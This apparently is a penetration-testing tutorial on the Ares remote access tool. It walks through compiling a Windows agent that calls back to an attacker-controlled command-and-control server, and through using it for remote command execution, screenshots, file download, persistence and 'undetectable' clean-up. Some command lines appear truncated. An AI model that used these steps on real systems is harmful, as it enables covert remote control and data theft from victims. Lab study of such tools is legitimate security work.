In this article,
we will learn how to use Ares tool. This tool performs the Command and Control
over the Web Interface. This tool can be found on GitHub.
Table of Content:
- Introduction
- Installation
- Exploiting Target
- Command Execution
- Capturing Screenshot
- File Download
- Compressing Files
- Persistence Agent
- Clean Up
Ares is a Python
Remote Access Tool. Ares is made of two main programs: A Command & Control
server, which is a Web interface to administer the agents and an agent program,
which runs on the compromised host, and ensures communication with the CNC. The
credit for creating this tool goes to Kevin
For this
particular demonstration,
Attacker: Kali
Target: Windows
To begin first,
we need the tool on our Attacker Machine. To do this, we will clone the tool
directly from the GitHub. After Cloning, we traversed into the newly created directory
called Ares through the cd command as shown in the image.
cd Ares
Now, to make the
tool work we will be needing to install some prerequisites. Let’s start from the file that we cloned
earlier name requirements.txt. This file contains the details of the python
libraries that are required to be installed.
pip install -r requirements.txt
Now as we have
our target a Windows Machine, we will need to compile the agent that is
compatible with the Windows Machine. To do that we will be needing wine. So,
using the file that we cloned earlier, let’s begin the wine installation. Now
this will take a bit of time.
Exploiting Target
Now that we have successfully installed all the
requirements needed to run the Ares tool. Its time to gain the Command and
Control Session. To do this we are going
to need an agent. For this, we use the cd command to traverse into the agent
directory. After that, we list the contents of the file to find a config file.
We will be needing to edit the file so as to gain the session.
cd agent/
As we can see, when we open the config file using the nano
command. We see that the SERVER variable has an IP Address. We are going to
edit it and change it to the internal IP address of the attacker machine, which
in my case is We don’t require any further changes. So Save and
Exit the nano editor.
Now that we have configured the config file, Its time
to create an agent. As we have a Windows Machine as a target. We will be
creating a windows agent using the command given below.
./ -p Windows
–server -o
Now, we will send this agent to the target machine by
any means of preference. After that, we will be needing to launch the server.
This is required as the agent will communicate to this server. Let’s get back
to the Ares directory. Here we have a sub-directory called server. After
traversing in it we will have to initiate the database for that we will be
using the initdb parameter. Initiating the database is to be done only the
first time. Now we will run the server as shown in the given image.
cd server/
./ initdb
./ runserver -h -p 8080 --threaded
Now we will open the server IP in our browser. Here we
will see a form asking for the password as shown in the given image. We entered
the password and clicked on Define to continue.
Now that the password is defined, we will have to
enter the password to log in.
Here we have the main index of the Ares GUI. It has the
following links: Change Password, Disconnect, Agent List. Now, we will go back
to the step where we created an agent. Only after we execute the agent on the
target machine, we will get a line Agent in Agent List.
As we can see the image given below, that we have an
agent alive. We have the name of the agent, status, user that was logged in
when the agent went live, we have the hostname too. We are also informed about
the IP Address and Operating System of the target. Here we could run the agent
on multiple devices each one of them will be visible here. We can select
sessions from here and execute the same command on multiple session at the same
time. We will have to click on the name to proceed.
Command Execution
As Ares runs the PowerShell commands, let’s start with
the System Information command. As we can see that we have all the system
config information of the target machine.
Capturing Screenshot
Now, Let’s take a screenshot of the target machine. To
do this we will type in the screenshot command and the agent will capture the
screenshot and provide a link as shown in the figure. On opening this link the
screenshot can be viewed.
File Download
We can also download files from the remote target using
this agent. To do this we require the name of the file. This can be obtained using
the dir command. Now once we have the filename, we will download it to our
local attacker machine as shown in the image given below.
download file.txt
We can compress a directory on the remote target using
the Ares agent. For this, we require the name of the directory. After we
extract the name of the directory, we can compress the file remotely using the
command given below. Here, we have ‘sample’ the name of the directory and
‘’ the name of the compressed file.
zip sample
We could invoke the persistence in the agent using the
command persist. This command installs the agent on the remote target.
Clean Up
This tool also performs the clean up after the work
through the session Is done. This command removes the agent from the target
machine. Hence it goes on undetectable.
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